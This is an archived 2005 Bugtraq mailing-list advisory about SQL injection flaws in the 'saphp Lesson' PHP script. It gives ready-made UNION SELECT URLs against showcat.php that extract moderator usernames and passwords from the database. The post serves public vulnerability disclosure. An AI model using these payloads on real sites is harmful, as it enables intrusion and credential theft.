lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20051024155229.16057.qmail@securityfocus.com> Date: 24 Oct 2005 15:52:29 -0000 From: almaster@...mail.com To: bugtraq@...urityfocus.com Subject: SQL saphp Lesson saphp Lesson .. Search By Google :- saphp Lesson Gr33tz :- aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster (at) hotmail (dot) com [email concealed]|- Devil-00 .. SQL Injection's Exploting - | devil-00@....cc | - Security4Arab .. A'Where Home .. 1- SQL Injection in showcat.php http://www.site.com/dros/showcat.php?forumid=|almaster 2-SQL Injection in add.php http://www.site.com/dros/add.php?forumid=|almaster Exp: - Get Username By This Injection : dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModName%20FROM%20modretor 2- Get Password By This Injection : dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModPassword%20FROM%20modretor aLMaSTeR [at] hotmail [dot] com